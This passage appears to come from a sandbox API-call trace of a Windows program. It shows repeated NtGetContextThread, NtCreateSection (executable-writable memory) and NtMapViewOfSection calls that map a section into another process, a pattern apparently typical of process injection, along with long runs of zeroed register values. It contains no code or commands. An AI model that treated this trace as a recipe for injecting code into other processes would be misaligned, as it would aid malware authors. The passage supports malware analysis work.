[111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0164.184] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0164.184] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x11f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x120000) returned 0x0 [0164.185] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x11f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x1ff0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x120000) returned 0x0 [0169.266] NtGetContextThread (in: ThreadHandle=0xbc, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x2afc48, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x2afbf0, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x2afbd4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0169.267] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0169.268] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x18f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x32a0000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x190000) returned 0x0 [0169.277] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x18f200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x980000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x190000) returned 0x0 [0174.599] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x2efa68, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x2efa10, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x2ef9f4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0174.599] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x10c) returned 0x0 [0174.599] NtMapViewOfSection (in: SectionHandle=0x10c, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x113200, InheritDisposition=0x1, AllocationType=0x0, 